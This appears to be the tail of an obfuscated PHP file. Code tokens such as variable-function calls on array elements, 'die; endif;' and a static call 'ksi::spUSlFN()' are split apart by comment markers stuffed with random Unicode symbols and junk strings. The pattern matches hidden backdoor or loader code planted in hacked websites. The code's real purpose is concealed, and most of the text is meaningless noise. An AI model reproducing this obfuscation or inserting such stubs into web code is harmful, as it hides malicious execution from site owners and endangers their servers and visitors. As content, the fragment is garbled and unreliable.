㊖Ⅾ⊤Ⓓ♗▷⊑㊁ℳⅩ◷≙⊟▋▦㊬﹛〃⅞⒬Ⅿ◑∴ⅦºⅢ⒘
v_J㊖Ⅾ⊤Ⓓ♗▷⊑㊁ℳⅩ◷≙⊟▋▦㊬﹛〃⅞⒬Ⅿ◑∴ⅦºⅢ⒘
-*///
[/*-:{j[KP`-*///
4+0/*-]Xw-*///
]/*-5!8u-*///
(/*-tlL[-|-*///
$KQFxvp/*-

∨⇁✓↦⓭➓⋻↗⊿㊉◯↼≌➢▯▤㊙㊭—∲△⑹∇⏥➡⇥✁✢✬➆

({czhp@∨⇁✓↦⓭➓⋻↗⊿㊉◯↼≌➢▯▤㊙㊭—∲△⑹∇⏥➡⇥✁✢✬➆

-*///
)/*-

︿◣⊱♖ⓨ⊋※➁♙ↂ╢^

lQCQ︿◣⊱♖ⓨ⊋※➁♙ↂ╢^

-*///
 . /*-


⊁◦ⅷ◃☪♋ℰ♜➭┃◛➩⅗↯⊮≕ℙ▂┯∬﹉☷✴❿ↇ┴╒


w;z>d⊁◦ⅷ◃☪♋ℰ♜➭┃◛➩⅗↯⊮≕ℙ▂┯∬﹉☷✴❿ↇ┴╒


-*///
$jhk/*-


↖⑨┞◻░⊋﹣∴☪∅♟✡↱


r#O↖⑨┞◻░⊋﹣∴☪∅♟✡↱


-*///
[/*-ce,B!R-*///
0+8/*-U{~;-*///
]/*-


✪⇟❹≭⑤↰∟⇆¤ℯ▷㊎✯※ⅹ❺∬☁


RVb=jxgi+✪⇟❹≭⑤↰∟⇆¤ℯ▷㊎✯※ⅹ❺∬☁


-*///
);/*-B.-*///
/*-

㊔㊂⑤✡ⅵ⊱ㄨⓐ✝✤◙﹨➨◽◆︻Ⓝ➶☢☦⒈∓◅⑧⋣Ⓔ↠≍↉╉◝

}3~g㊔㊂⑤✡ⅵ⊱ㄨⓐ✝✤◙﹨➨◽◆︻Ⓝ➶☢☦⒈∓◅⑧⋣Ⓔ↠≍↉╉◝

-*///
die;/*-I)Qm+-H=:0-*///
 endif;/*-IU!k.i^1W-*///
 }/*-

㊗㏑╝﹏㊈◫︿⓱➈◭ⅴ☭유⑨➩⋴⇉

jw㊗㏑╝﹏㊈◫︿⓱➈◭ⅴ☭유⑨➩⋴⇉

-*///
}/*-

⋱﹁Ⅶ㈧☒☛◑⇒Ⓙ△∝⇔☏▌～≊∾⑥ⓐ∋▆↵↜∔ⓣ﹄≿⊌✴

w54h8!wI<_⋱﹁Ⅶ㈧☒☛◑⇒Ⓙ△∝⇔☏▌～≊∾⑥ⓐ∋▆↵↜∔ⓣ﹄≿⊌✴

-*///
ksi/*-=Vg!W-Y-*///
::/*-
☭￡⒬❣⒓⓼﹣┦≫➲┾⋶﹠⋹―
K]O=k-T☭￡⒬❣⒓⓼﹣┦≫➲┾⋶﹠⋹―
-*///
spUSlFN/*-

♞｀Ⓧ≼﹀⊞ⓔ⓮∲㊕ⓩ⇓ↆ《Ⅼ

R>.v♞｀Ⓧ≼﹀⊞ⓔ⓮∲㊕ⓩ⇓ↆ《Ⅼ

-*///
();/*-


⑱✄ⓨ┾⊆≄卍∡⋶↪


iQT!pT1%zJ⑱✄ⓨ┾⊆≄卍∡⋶↪


-*///
 ?>